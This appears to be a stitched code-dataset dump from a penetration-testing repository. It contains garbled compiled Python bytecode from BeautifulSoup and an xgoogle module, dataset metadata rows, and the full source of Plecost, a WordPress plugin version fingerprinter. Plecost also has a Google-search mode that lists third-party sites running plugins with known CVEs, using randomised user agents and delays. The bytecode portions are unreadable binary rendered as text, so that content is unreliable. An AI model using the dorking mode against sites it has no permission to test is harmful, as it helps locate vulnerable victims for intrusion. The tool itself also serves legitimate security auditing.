BeautifulSOAPcBseZdZdÑZRS(sÀThis class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.cCsªt|iÉdjoî|id}|id}|iÉt|tÉo\t|iÉdjoFt|idtÉo/|ii|i É o|id||i <q™nt i |ÉdS(Niiˇˇˇˇi˛ˇˇˇi( R(R%R´R$RLRR&R∑R∞R3R˚R(RR/R ((s!/pentest/plecost/BeautifulSoup.pyRôs   &(R`RaRbR(((s!/pentest/plecost/BeautifulSoup.pyR†ÖstRobustXMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR°¨stRobustHTMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR¢ÆstRobustWackAssHTMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR£∞stRobustInsanelyWackAssHTMLParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR§≤stSimplifyingSOAPParsercBseZRS((R`Ra(((s!/pentest/plecost/BeautifulSoup.pyR•¥sRcBsbeZdZhdd6dd6ZgdedÑZdÑZdÑZd ÑZed ÑZ d ÑZ d ÑZ dfZ d ÑZh dgd6dd6dhd6did6djd6dkd6dld!6dmd$6dnd'6dod*6dpd-6dqd06drd36d4d56dsd86d4d96d4d:6dtd=6dud@6dvdC6dwdF6dxdI6dydL6dzdO6d{dR6d|dU6d}dX6d~d[6dd^6d4d_6dÄdb6dÅde6ZRS(ÇsœA class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.s mac-romant macintoshs shift-jissx-sjisR˝c CsÄd|_|i||É\|_}}||_g|_|djpt|tÉod|_t|É|_dSd}x)|D]!}|i |É}|oPqÄqÄW|p6x3||fD]!}|i |É}|oPqπqπWn| o>t o7t|itÉ o#|i t i |iÉdÉ}n|p0x-dD]!} |i | É}|oPq6q6Wn||_|p d|_ndS(NRÃRZsutf-8s windows-1252(sutf-8s windows-1252( R Rt_detectEncodingRÔRttriedEncodingsR$R\Rt _convertFromtchardettdetect( RRÔtoverrideEncodingsRRtdocumentEncodingtsniffedEncodingtutproposedEncodingtproposed_encoding((s!/pentest/plecost/BeautifulSoup.pyR†„s>       ##  cCsZ|ii|É}t|tÉo4|idjod|d}qVd|d}n|S(sDChanges a MS smart quote character to an XML or HTML entity.R˝s&#x%s;is&%s;i(tMS_CHARSR¨R$ttupleR(RtorigRì((s!/pentest/plecost/BeautifulSoup.pyt _subMSChars cs“ài|É}| p|àijodSàii|Éài}àio;|iÉdjo(tidÉi áfdÜ|É}ny(ài ||É}|à_|à_ Wnt j o }dSXàiS(Ns windows-1252s iso-8859-1s iso-8859-2s([Ä-ü])csài|idÉÉS(i(RµRä(Râ(R(s!/pentest/plecost/BeautifulSoup.pyRñs(s windows-1252s iso-8859-1s iso-8859-2( t find_codecR®R R0RÔRRRRRìt _toUnicodeRRı(RtproposedRÔRØte((Rs!/pentest/plecost/BeautifulSoup.pyR©s$      c Cst|Édjo9|d djo(|dd!djod}|d}nºt|Édjo9|d djo(|dd!djod}|d}np|d d jod }|d}nK|d d jod }|d}n&|d d jod}|d}nt||É}|S(sGiven a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliasesiis˛ˇtsutf-16besˇ˛sutf-16leisÔªøsutf-8t˛ˇsutf-32besˇ˛sutf-32le(R(R\(RRDRZtnewdata((s!/pentest/plecost/BeautifulSoup.pyR∑,s&$$cCs*d$}}y[|d djo|i|É}n4|d djo"d}t|dÉidÉ}nt|ÉdjoK|d djo:|dd!djo&d}t|ddÉidÉ}n£|d d jo"d }t|d ÉidÉ}npt|ÉdjoK|d d jo:|dd!djo&d }t|dd ÉidÉ}n|d d jo"d }t|d ÉidÉ}nfl|d djo"d}t|dÉidÉ}n¨|d djo&d }t|dd ÉidÉ}nu|d djo&d}t|ddÉidÉ}n>|d djo&d}t|ddÉidÉ}nd}Wn d$}nXtidÉi|É}| o/|o(tidtiÉ}|i |É}n|d$j oL|i Édi É}|o ||_ n|o|d%jo |}qn|||fS(&s3Given a document, tries to detect its XML encoding.isLoßît<?sutf-16besutf-8is˛ˇR∫s<?sutf-16lesˇ˛t<sutf-32bes<sutf-32leRªsˇ˛isÔªøtasciis!^<\?.*encoding=['"](.*?)['"].*\?>s#<\s*meta[^>]+charset=([^>]*?)[;'">]isiso-10646-ucs-2sucs-2t csunicodesiso-10646-ucs-4sucs-4tcsucs4sutf-16sutf-32tutf_16tutf_32tutf16tu16N( siso-10646-ucs-2sucs-2R¿siso-10646-ucs-4sucs-4R¡sutf-16sutf-32sutf_16sutf_32sutf16su16( R t_ebcdic_to_asciiR\R]R(RRRëtIROtgroupsRR(Rtxml_dataRt xml_encodingtsniffed_xml_encodingtxml_encoding_matchtregexp((s!/pentest/plecost/BeautifulSoup.pyRßEsj $ $        cCsi|i|ii||ÉÉpJ|o|i|iddÉÉp'|o|i|iddÉÉp|S(Nt-RÃt_(t_codectCHARSET_ALIASESR¨RY(Rtcharset((s!/pentest/plecost/BeautifulSoup.pyR∂âs##cCsI|p|Sd}yti|É|}Wnttfj onX|S(N(R tcodecstlookupt LookupErrorR (RR“tcodec((s!/pentest/plecost/BeautifulSoup.pyR–ès  cCsx|i}|ipUd}ddk}|iditttdÉÉÉditt|ÉÉÉ|_n|i|iÉS(Niiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇiˇˇˇˇRÃi(iiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇ( RotEBCDIC_TO_ASCII_MAPRmt maketransR•RùtchrR∏R)(RR_R‹temapRm((s!/pentest/plecost/BeautifulSoup.pyR∆ös.   =teurot20ACsÄRÕsÅtsbquot201AsÇtfnoft192sÉtbdquot201EsÑthellipt2026sÖtdaggert2020sÜtDaggert2021sátcirct2C6sàtpermilt2030sâtScaront160sätlsaquot2039sãtOEligt152såt?sçs#x17Dt17Dsésèsêtlsquot2018sëtrsquot2019sítldquot201Csìtrdquot201Dsîtbullt2022sïtndasht2013sñtmdasht2014sóttildet2DCsòttradet2122sôtscaront161sötrsaquot203Asõtoeligt153súsùs#x17Et17EsûtYumlRÃsüN(R€R‹(R›Rfi(RflR‡(R·R‚(R„R‰(RÂRÊ(RÁRË(RÈRÍ(RÎRÏ(RÌRÓ(RÔR(RÒRÚ(s#x17DRÙ(RıRˆ(R˜R¯(R˘R˙(R˚R¸(R˝R˛(RˇR(RR(RR(RR(RR(R R (R R (s#x17ER (RRÃ(R`RaRbR—RöR†RµR©R∑RßR∂R–R R◊R∆R≤(((s!/pentest/plecost/BeautifulSoup.pyR÷sZ  !   D    t__main__(?Rbt __future__Rt __author__t __version__t __copyright__t __license__tsgmllibRRR”t markupbasettypesRthtmlentitydefsRt ImportErrorR+t NameErrortsetsRRttagfindRët_declname_matchRhRRdR R\R&RtRuRwRxRLRJRRMR˙R˚RSRıR RéRüR†R°R¢R£R§R•R™R tcjkcodecs.aliasest cjkcodecst iconv_codecRR`tsyststdintsoupR€(((s!/pentest/plecost/BeautifulSoup.pyt<module>NsÇ       ˇ7#ˇñx ˇ∞ô$ ' ˇ  
67,544
Python
.py
489
134.490798
1,421
0.443139
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,915
plecost-0.2.2-9-beta.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/plecost-0.2.2-9-beta.py
#!/usr/bin/python # # Plecost: Wordpress finger printer tool. # # @url: http://iniqua.com/labs/ # # @author:Francisco J. Gomez aka ffranz (http://iniqua.com/) # @author:Daniel Garcia Garcia aka (http://iniqua.com/ - http://securitytoolslist.com) # # Code is licensed under -- GPLv3, http://www.gnu.org/licenses/gpl.html -- # # DISCLAIMER: # # import urllib import urlparse import urllib2 import re import sys import getopt import threading import random import time import os import shelve import cPickle as pickle from httplib import HTTPException from urllib2 import Request, urlopen, URLError from urlparse import urlparse from BeautifulSoup import BeautifulSoup from xgoogle.search import GoogleSearch, SearchError from threading import Thread # # General variables # WPCurrent_URL = "http://wordpress.org/download/" WPlug_URL = "http://wordpress.org/extend/plugins/browse/popular/page/" CVE_LIST = [] MinSleepTime = 10 MaxSleepTime = 20 ttl_cvelist = 604800 NumChecks = -1 WhithCVE = False OutPutFile = "output.txt" InputPluginList = "" PluginList = "" DisplayHelp = False TargetURL = "" ColoredOutput = False NumThreats = 2 CVE_file = "CVE.dat" verbose = True limitForSearch = 99999 help = ''' //////////////////////////////////////////// // ..................................DMI... // .............................:MMMM...... // .........................$MMMMM:........ // .........M.....,M,=NMMMMMMMMD........... // ........MMN...MMMMMMMMMMMM,............. // .......MMMMMMMMMMMMMMMMM~............... // .......MMMMMMMMMMMMMMM.................. // ....?MMMMMMMMMMMMMMMN$I................. // .?.MMMMMMMMMMMMMMMMMMMMMM............... // .MMMMMMMMMMMMMMN........................ // 7MMMMMMMMMMMMMON$....................... // ZMMMMMMMMMMMMMMMMMM.......plecost....... // .:MMMMMMMZ~7MMMMMMMMMO.................. // ....~+:................................. // // Plecost - Wordpress finger printer Tool (with threads support) 0.2.2-9-beta // // Developed by: // Francisco Jesus Gomez aka (ffranz@iniqua.com) // Daniel Garcia Garcia (dani@iniqua.com) // // Info: http://iniqua.com/labs/ // Bug report: plecost@iniqua.com ''' usage = ''' Usage: %s [options] [ URL | [-l num] -G]\r\n Google search options: -l num : Limit number of results for each plugin in google. -G : Google search mode Options: -n : Number of plugins to use (Default all - more than 7000). -c : Check plugins only with CVE associated. -R file : Reload plugin list. Use -n option to control the size (This take several minutes) -o file : Output file. (Default "output.txt") -i file : Input plugin list. (Need to start the program) -s time : Min sleep time between two probes. Time in seconds. (Default 10) -M time : Max sleep time between two probes. Time in seconds. (Default 20) -t num : Number of threads. (Default 1) -h : Display help. (More info: http://iniqua.com/labs/) Examples: * Reload first 5 plugins list: plecost -R plugins.txt -n 5 * Search vulnerable sites for first 5 plugins: plecost -n 5 -G -i plugins.txt * Search plugins with 20 threads, sleep time between 12 and 30 seconds for www.example.com: plecost -i plugin_list.txt -s 12 -M 30 -t 20 -o results.txt www.example.com ''' % (sys.argv[0]) #################################################################################################################################################### # # Functions and classes # #################################################################################################################################################### # # Class for search CVE # class CVE(object): ''' CVE class to manage vulnerabiliti info. ''' def __init__(self): ''' Constructor ''' def CVE_list(self, key_word): ''' Create a object file. Content: CVE entries [Id,Description]. Search by keyword in wordpress. ''' try: cve_file = file(CVE_file,"w") except IOError: print "No such file or directory" try: cve = urllib2.urlopen("http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword="+key_word).read() except URLError: print "" cve_tree = BeautifulSoup(cve) count = 0 for ana in cve_tree.findAll('a'): if ana.parent.name == 'td': cve_link = ana["href"] if cve_link.find("/cgi-bin/cvename.cgi?name=") != -1: count += 1 try: page2 = urllib2.urlopen("http://cve.mitre.org" + cve_link).read() except URLError: print "" soup2 = BeautifulSoup(page2) for ana2 in soup2.findAll('th'): if ana2.text == "Description": CVE_LIST.append([cve_link.split('=')[1],ana2.findNext('td').text]) pickle.dump([cve_link.split('=')[1],ana2.findNext('td').text],cve_file,2) cve_file.close() def CVE_loadlist(self): ''' Load data from CVE.dat file to CVE_list[] ''' try: cve_file = file(CVE_file) except IOError: print "No such file or directory" while True: try: cve_entry = pickle.load(cve_file) except EOFError: break CVE_LIST.append(cve_entry) cve_file.close() def CVE_search(self, plugin_name): ''' Search into CVE list. Return CVE ID list ''' CVE_search_list = [] search = plugin_name for sublist in CVE_LIST: if sublist[1].lower().find(search.lower()) != -1: CVE_search_list.append(sublist[0]) return CVE_search_list # # Class for analyze a website # class Wordpress(Thread): ''' Wordpress class. Handle info about plugins ''' def __init__(self): self.all_run = [] ''' Constructor ''' def pluginlist_generate(self): ''' Create popular plugin list ''' url_count = 1 plugin_count = 0 plugin_cve = CVE() if not os.path.isfile(CVE_file): plugin_cve.CVE_list("wordpress") stats = os.stat(CVE_file) if int(time.time()) - int(stats[8]) > ttl_cvelist : print "" print "- CVE file is too old. Reload now?[y/n]:", opt = sys.stdin.readline() if opt.strip() == "y": print "" print "- Really?[y/n]:", opt = sys.stdin.readline() if opt.strip() == "y": print "" print "- Reloading CVE list... by patient" plugin_cve.CVE_list("wordpress") else: print "- Maybe later." plugin_cve.CVE_loadlist() try: wp_file = file(PluginList,"w") except IOError: print "" print "[!] Error opening file: \"" + PluginList + "\"" print "" sys.exit(-1) final_countdown = 1 end = 0 tmpCount = 0 while True: try: wpage = urllib2.urlopen(WPlug_URL+"/"+str(url_count)+"/").read() except URLError: print "" print "[!] Web site of plugin is not accesible." print "" sys.exit(-1) url_count += 1 wpsoup = BeautifulSoup(wpage) if str(wpsoup).find('plugin-block') == -1: print "Wordpress plugin list end:" break for ana in wpsoup.findAll('a'): plugin_url = ana["href"] if plugin_url.find("wordpress.org/extend/plugins/") != -1 and plugin_url.find("popular") == -1 and plugin_url.find("tags") == -1 and plugin_url.find("google.com") == -1 and plugin_url.find(".php") == -1: plugin_count += 1 if (plugin_url.split('/')[5] != '' ): name = plugin_url.split('/')[5] if len(ana.findNext('li').contents) == 2: version = ana.findNext('li').contents[1] if name != "tac": cves = plugin_cve.CVE_search(plugin_url.split('/')[5]) cves_l = "" for l in cves: cve_a = l+";" cves_l = cves_l + cve_a if type(version) == unicode: version = unicode(version, errors='replace') else: pass u_version = version.encode('utf-8') try: wp_file.write(name+","+u_version+","+cves_l+"\n") except Exception: pass if int(NumChecks) != -1 and (plugin_count - 1) == int(NumChecks): end = 1 break if end == 1: break if tmpCount == 1: print plugin_count, print " plugins stored. Last plugin processed: " + name sys.stdout.flush() tmpCount = 0 else: tmpCount+=1 wp_file.close() # Private call for each URL. This method hava main code to check the URL. def check_url(self,url): ''' Check Wordpress and plugin version. ''' # try to open file output if OutPutFile != None: try: fileoutput = open(OutPutFile,"w") except IOError: print "" print "[!] Error while open output file." print "" sys.exit(-1) readmeok = False # Check WordPress version try: filetmp = "\nResults for: " + url + "\n\n" filetmp += " -------- \n" if url.find("http://") == -1: readme = urllib2.urlopen("http://"+url+"/readme.html") else: readme = urllib2.urlopen(url+"/readme.html") soupreadme = BeautifulSoup(readme) version = soupreadme.find('h1') location = str(version).find("Versi") print "" print "==> Results for: " + url + " <==" print "" print chr(27) + "[0;91m[i] Wordpress version found: ", filetmp += "\nWordpress version found: " if location != -1: print str(version)[(location + 8):(location + 14)].split("\n")[0] filetmp += str(version)[(location + 8):(location + 14)].split("\n")[0] + "\n" wpCurrentVersion = urllib2.urlopen(WPCurrent_URL) soupwpCurrentVersion = BeautifulSoup(wpCurrentVersion) versionwpCurrentVersion = soupwpCurrentVersion.find('div', attrs={'class': 'col-3'}).find('p', attrs={'class': 'download-meta'}).find('strong').contents[0].split(';')[2] print "[i] Wordpress last public version: "+str(versionwpCurrentVersion) else: print "Not result" filetmp += "Not result\n" filetmp += "\n\n" fileoutput.write(filetmp) print chr(27) + "[0;0m" except URLError: print "" print "[!] Can't open URL especified: \"" + url + "\"" print "" try: plugin_list = open (InputPluginList,"r") except IOError: print "" print "[!] Error while open the plugins list." print "" sys.exit(-1) # Search for each plugin final_countdown = 1 print "" print "[*] Search for installed plugins" print "" # Lock for threads lock = threading.Lock() # Semaphore for write in order to screen self.screenSemaphore = threading.Semaphore(1) # Semaphore for write in order to screen self.checkSimultaneus = threading.Semaphore(int(NumThreats)-1) # Semaphore for write in file self.writeFile = threading.Semaphore(int(NumThreats)-1) # hunt keyboard interrupt try: for line in plugin_list: self.checkSimultaneus.acquire() cves = "-" try: plugin, version, cves= line.split(",") except: continue # Create thread t = threading.Thread(target=self.__siteSearch, args=(url,plugin,cves,version,fileoutput,cves,)) self.all_run.append(t) # run thread self.all_run[len(self.all_run)-1].start() final_countdown += 1 if int(NumChecks) != -1 and final_countdown == int(NumChecks): break except KeyboardInterrupt: sys.exit(-1) plugin_list.close() fileoutput.close() print "[*] Done" return 0 # Main code for search infor for each code def __siteSearch(self,url,plugin,cve,version,fileoutput,cves): if url.find("http://") == -1: url_readme = "http://"+url+"/wp-content/plugins/"+plugin+"/readme.txt" else: url_readme = url+"/wp-content/plugins/"+plugin+"/readme.txt" try: try: data = urllib.urlopen(url_readme).read() except IOError: return readme_found = data.find("== Description ==") location = data.find("Stable tag:") # check if README.txt exist if readme_found == -1: if url.find("http://") == -1: url_readme = "http://"+url+"/wp-content/plugins/"+plugin+"/README.txt" else: url_readme = url+"/wp-content/plugins/"+plugin+"/README.txt" try: data = urllib.urlopen(url_readme).read() except IOError: return readme_found = data.find("== Description ==") location = data.find("Stable tag:") printToScreen = "" if readme_found != -1: # screen results printToScreen += "\n" printToScreen += chr(27)+ "[0;92m"+"[i] Plugin found: " + plugin + "\n" printToScreen += chr(27)+ "[0;94m"+" |_Latest version: " + version + "\n" # File results filetmp = "\n" filetmp += "Plugin found: " + plugin + "\n" filetmp += "|_Latest version: " + version + "\n" if location != -1: printToScreen += chr(27)+"[0;91m"+" |_ Installed version: " + data[(location + 12):(location + 17)].split("\r")[0] + "\n" filetmp += "|_ Installed version: " + data[(location + 12):(location + 17)].split("\r")[0] + "\n" else: printToScreen += " |_Installed version: No results" + "\n" filetmp += "|_Installed version: No results" + "\n" filetmp += "\n" # Write results on file self.writeFile.acquire() fileoutput.write(filetmp) fileoutput.flush() self.writeFile.release() if cves != None and cves != "-" and cves != "\n": printToScreen += chr(27)+"[0;91m"+" |_CVE list: \n" for i in cves.split(";"): if i!="\n": printToScreen += chr(27)+"[0;91m"+" |___" + i + ": (http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + i + ")\n" printToScreen += chr(27)+ "[0m" self.screenSemaphore.acquire() # lock screen console print printToScreen, self.screenSemaphore.release() # release screen console # Release for new thread self.checkSimultaneus.release() except KeyboardInterrupt: raise KeyboardInterrupt return # # Class for search on google # class gsearch(Thread): # Attributes filename = None plugins = None file = None outfilename = None outfile = None sites = None # # Results array format # # [0] = Hostaname # [1] = Plugin # [2] = Latest version # [3] = Version instaled # [4] = CVE # [5] = Exploit (for future use) results = None # Default constructor def __init__(self, filename, outfilename): self.filename = filename self.outfilename = outfilename self.plugins = [] self.sites = {} self.results = [] # Open input and output file def openFiles(self): list = self.plugins try: self.file = open(self.filename,"r") except IOError: print "" print "[!] Error while read the plugins file." print "" sys.exit(-1) try: self.outfile = open(self.outfilename, "w+") except IOError: print "" print "[!] Error while open output file" print "" sys.exit(-1) # Read next plugin def readNextPlugin(self): return self.file.readline() # Search README.txt def searchReadme(self,site,plugin,cap): # Make complete URL if cap == "nocap": url = "http://" + site + "/wp-content/plugins/" + plugin + "/readme.txt" else: url = "http://" + site + "/wp-content/plugins/" + plugin + "/README.txt" # Open site res = None try: req = Request(url.encode('utf8')) res = urlopen(req) data = res.read() # Close conection except URLError: return "" except ValueError: return "" except HTTPException: return "" return data # Search plugin version in text def getVersion(self,text): if text.find("== Description ==") != -1: location = text.lower().find("stable tag:") if location != -1: return text[(location + 12):(location + 17)].split("\r")[0] return "Not result" # Write file output def writeOutput(self,results): if results == None: return for i in results: tmp = "" for j in i: rep = j.replace("\n","") tmp = tmp + rep + "," tmp=tmp + "\n" self.outfile.write(tmp) self.outfile.flush() # Get the google results def getGoogleResults(self,pluginname,latest,cve): try: gs = GoogleSearch("inurl:'wp-content/plugins/" + pluginname + "'", random_agent=True) gs.results_per_page = 100 numberOfprocessed = 0 self.all_run = [] for i in range(int(limitForSearch)): results = gs.get_results() if not results: break # Semaphore for write in order to screen self.checkSimultaneus = threading.Semaphore(int(NumThreats)) # Semaphore for write to file self.writeFile = threading.Semaphore(int(NumThreats)-1) for res in results: self.checkSimultaneus.acquire() host_name = urlparse(res.url.encode()).hostname # Create thread t = threading.Thread(target=self.__getGoogleResults, args=(host_name,latest,pluginname,cve)) self.all_run.append(t) # run thread self.all_run[len(self.all_run)-1].start() except SearchError, e: print "Search failed: %s" % e # Private search for each thread def __getGoogleResults(self,host_name,latest,pluginname,cve): version = "" version2 = "" results = [] if host_name: readme = self.searchReadme(host_name, pluginname, cap="nocap") if readme: version = self.getVersion(readme) if version == "Not result" or version == "": readme = self.searchReadme(host_name, pluginname, cap="cap") if readme: version2 = self.getVersion(readme) if verbose == True : print " - Site: " + host_name + " || Plugin: " + pluginname + "|| Only cached by Google" results.append([host_name,pluginname,"Only cached by Google",latest,version2.strip(),cve]) else: if verbose == True: print " - Site: " + host_name + " || Plugin: " + pluginname + "|| Yet installed on site" results.append([host_name,pluginname,"Yet installed on site",latest,version.strip(),cve]) # write resulta to file self.writeFile.acquire() self.writeOutput(results) self.writeFile.release() del results self.checkSimultaneus.release() # Main method def Run(self): # Open the files self.openFiles() # List the results final_countdown = 1 equalversion = 0 nequalversion = 0 totalplugins = 0 while True: readed=(self.readNextPlugin()) if not readed: break try: plugin,latestversion,cves=readed.split(",") except: continue # Check if there is to find those without CVE if WhithCVE == True: continue # search self.getGoogleResults(plugin,latestversion,cves) # Sleep for few seconds timeToSleep=random.randint(MinSleepTime,MaxSleepTime) print "" print " **** Sleep " + str(timeToSleep) + " seconds..." print "" time.sleep(timeToSleep) final_countdown += 1 if int(NumChecks) != -1 and final_countdown == int(NumChecks): break totalplugins = final_countdown self.outfile.close() def reload_pluginlist(): wordpress = Wordpress() wordpress.pluginlist_generate() #################################################################################################################################################### # # Begin of program # #################################################################################################################################################### try: opt, args = getopt.getopt(sys.argv[1:], "l:Gi:t:s:M:R:ho:cn:C",['google-search','input-file=','threads=','min-sleep-time=','max-sleep-time=','reload-plugin','help','output-file=','colored','try-num','without-cve']) options=dict(opt) except getopt.GetoptError, err: if err.opt == "R": print "" print "[!] You must to specify file output for \"-R\" parameter." print "" if err.opt == "i": print "" print "[!] You must to specify a input plugins file for \"-i\" parameters." print "" if err.opt == "o": print "" print "[!] You must specify output file for \"-o\" parameters." print "" if err.opt == "s": print "" print "[!] You must to specify minimun sleep time for \"-s\" parameter." print "" if err.opt == "M": print "" print "[!] You must to specify maximun sleep time for \"-M\" parameter." print "" if err.opt == "n": print "" print "[!] You must to specify a number of check for \"-n\" parameter." print "" if err.opt == "l": print "" print "[!] You must to specify a number of limit results for google search \"-n\" parameter." print "" sys.exit(-1) if len(sys.argv) <= 1: print help print usage sys.exit(-1) # Show help? if "-h" in options: print help print usage sys.exit(0) # Number of checks if "-n" in options: try: NumChecks = options["-n"] if NumChecks < 0: raise Exception print "[*] Num of checks set to: " + NumChecks except Exception: print "" print "[!] You must to specify a number of check for \"-n\" parameter." print "" sys.exit(-1) # Reload option if "-R" in options: PluginList = options["-R"] print "[*] Plugin file list set to: " + PluginList # Reload plugin options print "" print "[*] Reloading plugins list..." try: r=Wordpress() r.pluginlist_generate() except KeyboardInterrupt: print "" print "[*] Exiting..." print "" print "[*] done." sys.exit(0) # Input file plugins if not "-i" in options: print "" print "[!] You must to specify \"-i\" parameter." print "" sys.exit(-1) else: InputPluginList = options["-i"] print "" print "-------------------------------------------------" print "[*] Input plugin list set to: " + InputPluginList # Output file for results if "-o" in options: OutPutFile = options["-o"] print "[*] Output file set to: " + OutPutFile # Colored output?check if there is to find those without CVE if "-c" in options: print "[*] Colored output set on." ColoredOutput = True # Without cve parameter if "-C" in options: WhithCVE = False # Num of threat parameter if "-t" in options: NumThreats = options["-t"] if NumThreats < 1: print "" print "[!] Number of threats must be > 0." print "" sys.exit(-1) print "[*] Num of threats set to: " + NumThreats # Min sleep time if "-s" in options: MinSleepTime = int(options["-s"]) print "[*] Min sleep time set to: " + str(MinSleepTime) # Max sleep time if "-M" in options: MaxSleepTime = int(options["-M"]) # check if the minimun is not major than maximun if MinSleepTime > MaxSleepTime: print "" print "[!] The minimun sleep time can't be major than Maximun sleep time." print "" print "[*] Max sleep time set to: " + str(MaxSleepTime) # Googler search option if "-G" in options: print "[*] Searching for google results... " print "" # Output file if not "-o" in options: print "" print "[!] You must specify output file for \"-o\" parameters." print "" sys.exit(-1) # check if limit is set if "-l" in options: limitForSearch = options["-l"] if not limitForSearch.isdigit(): print "" print "[!] \"-l\" option must be interger number." print "" sys.exit(-1) OutPutFile = options["-o"] print "[*] Max results set to: ", print limitForSearch print "[*] Output file set to: " + OutPutFile print "-------------------------------------------------" try: # Call the function s=gsearch(InputPluginList,OutPutFile) s.Run() print "[*] Done" except KeyboardInterrupt: print "" print "[*] Exiting..." print "" sys.exit(-1) # Check target try: TargetURL = args[0] except Exception: print "" print "[!] You must to specify a target. Try with \"-h to for more info\"" print "" sys.exit(-1) # close params header print "-------------------------------------------------" # # Start of program # try: website = Wordpress() website.check_url(TargetURL) except KeyboardInterrupt: print "" print "[*] Exiting..." print ""
27,299
Python
.py
764
26.789267
227
0.531507
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,916
browser.pyc
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/browser.pyc
—Ú ›ªMc@s™ddkZddkZddkZddkZddkZdZdZdefdÑÉYZdei fdÑÉYZ dei fdÑÉYZ de fdÑÉYZdS(iˇˇˇˇNsZMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6saMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6soMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)siMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6sZMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6soMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)svMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19sàMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)skMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6sfMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5sMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1sJMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)sKMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)s2Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)it BrowserErrorcBseZdÑZRS(cCs||_||_dS(N(turlterror(tselfRR((s#/pentest/plecost/xgoogle/browser.pyt__init__*s (t__name__t __module__R(((s#/pentest/plecost/xgoogle/browser.pyR)stPoolHTTPConnectioncBseZdÑZRS(cCs6d}xti|i|idtiÉD]Ï}|\}}}}}yeti|||É|_|idjod|i|ifGHn|iitÉ|ii |ÉWnhti j oY}|idjodG|i|ifGHn|io|ii Énd|_q(nXPq(W|ipti 